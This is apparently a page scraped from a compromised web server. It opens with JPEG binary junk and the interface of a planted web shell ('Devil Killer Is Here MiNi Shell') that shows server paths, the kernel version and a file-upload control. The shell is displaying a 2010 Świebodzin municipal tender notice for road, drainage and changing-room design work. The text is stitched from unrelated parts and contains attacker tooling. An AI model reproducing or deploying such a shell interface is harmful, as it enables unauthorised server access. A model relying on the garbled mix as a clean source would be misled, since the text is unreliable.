JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/45119-N-2010.html

<p class="kh_header"><b>Świebodzin: Opracowanie dokumentacji projektowo-kosztorysowej na 8 zadań inwestycyjnych z podziałem na 4 GRUPY</b><br>
<b>Numer ogłoszenia: 45119 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 068 4750916, faks 068 4750918.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej na 8 zadań inwestycyjnych z podziałem na 4 GRUPY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej na 8 zadań inwestycyjnych z podziałem na 4 GRUPY:
1.1.Odwodnienie i modernizacja nawierzchni podwórek w Świebodzinie, w tym:
1.1.1.GRUPA I:
Zadanie 1: ul. Okrężna 1 i 1-go Maja 7 
 ( działka 228/17 i 229/4 o pow. ok. 686 m2 ze zjazdem w ul. Okrężnej- w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Okrężnej)
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
Zadanie 2: ul. J. Piłsudskiego 4 i Łużycka 1, 3 ( działka 499/28 o pow. ok. 1812 m2, część działki 499/19 (brama przejazdowa w budynku) - w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Łużyckiej)
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
Lub 
1.1.2GRUPA II:
Zadanie 1: ul. J. Piłsudskiego 32-38  ( część działki 537/74 o pow. ok. 630 m2- w ramach opracowania utwardzenie terenu, wykonanie zjazdu w ul. Piłsudskiego (dz. Nr 542) i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Piłsudskiego)
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
Zadanie 2: ul. J. Piłsudskiego 30 ( część działki 537/74 o pow. ok. 326 m2- w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Piłsudskiego)
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
Zadanie 3: ul. J. Piłsudskiego 57 ( część działki 546/18 o pow. ok. 99 m2- w ramach opracowania utwardzenie terenu i przebudowa odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Łąki Zamkowe-Słowackiego)
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
lub
1.2. GRUPA III:
Zadanie 1: Budowa chodnika wraz z oświetleniem w miejscowości Rozłogi 
obejmujące m.in.:
- projekt chodnika na części działki nr 22/5, nr 22/6, nr22/1 przy drodze gminnej dz. Nr 136 szer 1,5 m i dł. ok.255  ,
- projekt oświetlenia drogowego,
-odwodnienie pasa drogowego.
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
Zadanie 2: Budowa dodatkowego pasa ruchu dla prawoskrętu na skrzyżowaniu ul. Osiedlowej z ul. Sulechowską w Świebodzinie  obejmujące m.in.:
- projekt dodatkowego pasa ruchu dla prawoskrętu na ul. Osiedlowej przed skrzyżowaniem z ul. Sulechowską na dł. ok. 35m , chodnik szer. ok. 1,5 m  (działka 348/1, 796/20, część działki 353/1 - droga powiatowa)    ,
- projekt przebudowy kanalizacji deszczowej - przesunięcie wpustów ulicznych kanalizacji deszczowej,
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
1.3. GRUPA IV, Zadanie 1: Budowa szatni sportowej w miejscowości Jordanowo
(o pow. zabudowy ok. 132 m2)
obejmujące m.in.:
- inwentaryzację i ocenę stanu technicznego istniejącego budynku,
- szatnie dla dwóch druzyn piłki noznej z sanitariatami, pomieszczenie dla 3 sędziów z sanitariatami, magazyn,
- instalacje elektryczne ( szafka przyłączeniowa istniejąca przy budynku), 
- instalacje wod-kan,
- przyłącze wody z istniejącej studni głębinowej z analizą jej wydajności i przydatności do celów sanitarnych i podlewania murawy,
- zbiornik bezodpływowy o poj. do 10 m3 z odprowadzeniem do niego ścieków.
Szczegółowy zakres opracowań został określony w specyfikacji technicznej.
2.Opracowanie dokumentacji projektowo-kosztorysowej dla każdego zadania oddzielnie w zakresie:
a)Wykonanie inwentaryzacji i oceny stanu technicznego istniejącego budynku  z analizą wydajności studni i przydatności wody do celów sanitarnych i podlewania dla Grupy IV Zadania 1,
b)niezbędnej dokumentacji geodezyjno-kartograficznej zgodnej z Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących  w budownictwie (Dz.U. Nr 25, poz. 133)-mapa do celów projektowych lub matryca lewostronna do celów projektowych w zakresie niezbędnym do opracowania dokumentacji projektowej,
c)niezbędnej dokumentacji geologicznej zgodnej z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 września 1998 r. w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych (Dz. U. Nr 126, poz. 839), 
d)dokumentacji  ,zawierającej m.in.:
1/ projekt budowlany,
2/ projekty wykonawcze, 
3/ przedmiary robót,
4/ informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane ze względu na specyfikę projektowanego obiektu budowlanego,  
e)kosztorys inwestorski  wraz z zestawieniem robocizny , materiałów i sprzętu dla każdego z zadań  oddzielnie. 
f)zbiór specyfikacji technicznych wykonania i odbioru robót określających szczegółowe warunki  i wymagania stosowania materiałów, sposób wykonania robót, użycia sprzętu itp. a także wymagania w zakresie kontroli, wykonania badań i odbiorów, prób, rozruchów itp. przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane (wykaz norm w Obwieszczeniu Prezesa Polskiego Komitetu Normalizacyjnego z dnia 19 grudnia  2003 r. w sprawie wykazów norm zharmonizowanych - M.P. z 2004 r. Nr 7, poz. 117),  a w przypadku ich braku z uwzględnieniem norm powołanych w art. 30 ust. 2 ustawy z dnia  29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), 
g)projekty organizacji ruchu na czas budowy i organizacji stałej opracowane zgodnie z ustawą   z dnia 20 czerwca 1997 r. prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908 z późn. zm.) i wydanymi rozporządzeniami na jego podstawie- dla  Grupy I , Grupy II, Grupy III ,
h)kosztorysy ofertowe do wypełnienia przez wykonawców zawierające następujące pozycje: Lp. podstawa wyceny z opisem pozycji-w przypadku pozycji indywidualnych nakłady robocizny, materiałów i sprzętu, jednostka miary, ilość, cena jednostkowa, wartość,   Nie mogą być to kosztorysy nakładcze.
i)-GRUPA I i GRUPA II :uzyskania niezbędnych danych do projektowania, opinii,  warunków przyłączenia, uzgodnień, w tym Zespołem Uzgadniania Dokumentacji w Starostwie Powiatowym , decyzji, w tym decyzji o warunkach zabudowy, decyzji o środowiskowych uwarunkowaniach realizacji inwestycji; sprawdzeń rozwiązań projektowych  w zakresie wynikającym z przepisów , uzgodnienie projektu z Lubuskim Wojewódzkim Konserwatorem Zabytków i uzyskanie decyzji LWKZ, uzyskanie w imieniu zamawiającego decyzji pozwolenia na budowę,
 -GRUPA III :uzyskania niezbędnych danych do projektowania, opinii, uzgodnień, w tym Zespołem Uzgadniania Dokumentacji w Starostwie Powiatowym, sprawdzeń rozwiązań projektowych  w zakresie wynikającym z przepisów, uzyskanie w imieniu zamawiającego decyzji pozwolenia na budowę 
-GRUPA IV: uzyskania niezbędnych danych do projektowania, opinii, uzgodnień, w tym  Zespołem Uzgadniania Dokumentacji w Starostwie Powiatowym , sprawdzeń rozwiązań projektowych  w zakresie wynikającym z przepisów, uzyskanie w imieniu zamawiającego decyzji pozwolenia na budowę,
j)wykonanie i przekazanie opracowań w/w w 2 egz. dla zamawiającego dla każdego zadania, za wyjątkiem:
- projektu budowlanego, który należy przekazać w 3 egz. dla zamawiającego plus 2 egz. dla Starostwa Powiatowego ,
- projektu wykonawczego w 3 egz. dla zamawiającego,
- komplet opracowań (projekty,  kosztorysy, specyfikacje techniczne) w wersji elektronicznej do udostępnienia przy wyborze wykonawcy zadań:
-pliki tekstowe z rozszerzeniem: doc, 
-pliki obliczeniowe i kosztorysy ofertowe z rozszrzeniem: xls,
-pozostałe pliki w formacie: PDF.
wraz z oświadczeniem o kompletności tych prac.
k)wykonawca w ramach wynagrodzenia za przedmiot  umowy obowiązany będzie do:  
- niezwłocznych pisemnych wyjaśnień w trakcie procedury przetargowej na wybór wykonawcy  robót budowlanych dotyczących projektu,
- uzupełnienia szczegółów projektowych oraz wyjaśnienia wykonawcy robót wątpliwości powstałych w toku realizacji robót , na pisemne wezwanie  Zamawiającego w terminie do 7 dni od daty ich ujawnienia i uzyskania informacji od Zamawiającego, w ramach udzielonej gwarancji na wykonanie przedmiotu umowy,
- usunięcia wad i usterek w dokumentacji projektowej w ramach udzielonej gwarancji na wykonanie przedmiotu umowy,przy czym Wykonawca przystąpi do usuwania usterek i wad w terminie do 3 dni od otrzymania wezwania od Zamawiającego. W w/w wezwaniu Zamawiający ustali termin na usuniecie stwierdzonych usterek i wad. 
- uczestnictwa w wizjach w przypadku błędów i konieczności uszczegółowienia rozwiązań projektowych,
- uczestnictwa w odbiorze końcowym inwestycji.
3.Projekty powinny być zaopatrzone w wykaz opracowań oraz pisemne oświadczenia Wykonawcy, że są wykonane zgodnie z umową , obowiązującymi przepisami i normami i że zostają  wydane w stanie kompletnym z punktu widzenia celu, któremu mają służyć.
Wykaz opracowań oraz pisemne oświadczenia, o których mowa wyżej, stanowią integralną część przedmiotu odbioru.
4. Sprawowanie nadzoru autorskiego na żądanie zamawiającego lub właściwego organu wg odrębnej umowy w oparciu o następujące zasady.
4.1. w następującym zakresie  :
a/ uzgadniania z zamawiającym i wykonawcą możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i urządzeń  przewidzianych  w dokumentacji projektowej, na pisemne wezwanie zamawiającego ,
4.2. według następujących zasad finansowania :
a/ prace w  zakresie określonym w pkt. 4.1. a)  rozliczane będą na podstawie Środowiskowych  Zasad Wycen Prac Projektowych - PTE  , wielkość   stawki normogodziny - przyjmuje się stawkę ustalaną rokrocznie przez Radę Koordynacyjną Biur   Projektów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.40.00-4, 71.33.20.00-4, 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać,że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej dwa projekty, odpowiadające przedmiotowi zamówienia o wartości brutto co najmniej każdy:
-30 000 zł  gdy oferta składana na  GRUPĘ I albo GRUPĘ II,
- 20 000 zł  gdy oferta składana na GRUPĘ III,
- 15 000 zł gdy oferta składana na GRUPĘ IV,
- gdy oferta składana  na kilka grup o wartości co najmniej co suma wymagana dla poszczególnych grup , na które składana jest oferta.  
(Np. oferta składana na GRUPĘ I, GRUPĘ II i GRUPĘ III - to co najmniej 80 000 zł każde opracowanie itd.)
z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami należącymi do właściwej izby samorządu zawodowego i posiadającymi zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm) uprawnienia do projektowania  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów:
1.) GRUPA I i GRUPA II:
a) w specjalności drogowej w co najmniej ograniczonym zakresie z co najmniej 3-letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
b) w specjalności instalacyjnej w zakresie sieci kanalizacyjnych z co najmniej 3 -letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
2) GRUPA III Zadanie 1:
a) w specjalności drogowej w co najmniej ograniczonym zakresie z co najmniej 3-letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
b) w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych  z co najmniej 3-letnią praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
3) GRUPA III Zadanie 2:
a) w specjalności drogowej w co najmniej ograniczonym zakresie z co najmniej 3-letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
b) w specjalności instalacyjnej w zakresie sieci kanalizacyjnych z co najmniej 3 -letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
4) GRUPA I V:
a) w specjalności konstrukcyjno-budowlanej w co najmniej ograniczonym zakresie z co najmniej 3-letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
c) w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych z co najmniej 3 -letnia praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,
d) w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych bez ograniczeń z co najmniej 3-letnią praktyką w projektowaniu po uzyskaniu uprawnień budowlanych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych .
2.Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów (wiedza i doświadczenie, osoby zdolne do wykonania zamówienia) na okres korzystania z nich przy wykonywaniu zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków, o ile wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych;
3.Oświadczenie,że wykonawca wykona zamówienie siłami własnymi lub określi część zamówienia, której wykonanie powierzy podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem, że :
1.1. GRUPA I i GRUPA II: 
Wykonawca nie uzyskał pozytywnej decyzji, opinii właściwego organu w terminie do 2 m-cy od daty udokumentowanego złożenia wniosku , z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie  przedmiotu umowy;
1.2. GRUPA III:
a) Wykonawca nie uzyskał pozytywnej decyzji, opinii właściwego organu w terminie do 1 m-ca od daty udokumentowanego złożenia wniosku , z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie  przedmiotu umowy,
b) Wykonawca nie otrzymał od Zamawiającego  decyzji o ustaleniu lokalizacji celu publicznego na Zadanie 1 i Zadanie 2 oraz decyzji o środowiskowych uwarunkowaniach realizacji inwestycji dla Zadania 2 w terminie do 1 m-ca od daty zawarcia umowy,
1.3. GRUPA IV:
a) Wykonawca nie uzyskał pozytywnej decyzji, opinii właściwego organu w terminie do 1 m-ca od daty udokumentowanego złożenia wniosku , z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie  przedmiotu umowy,
2.W przypadku wystąpienia przyczyn, o których mowa w ust. 1 , strony uzgodnią nowe terminy realizacji przedmiotu niniejszej umowy w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 47. Cena Specyfikacji Istotnych Warunków Zamówienia 30 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 12:00, miejsce: Urząd Miejski w Świebodzinie, ul. Rynkowa 2, pok. nr 22..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA I:
Zadanie 1: ul. Okrężna 1 i 1-go Maja 7 
 ( działka 228/17 i 229/4 o pow. ok. 686 m2 ze zjazdem w ul. Okrężnej- w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Okrężnej)
Zadanie 2: ul. J. Piłsudskiego 4 i Łużycka 1, 3 ( działka 499/28 o pow. ok. 1812 m2, część działki 499/19 (brama przejazdowa w budynku) - w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Łużyckiej).</p></li>
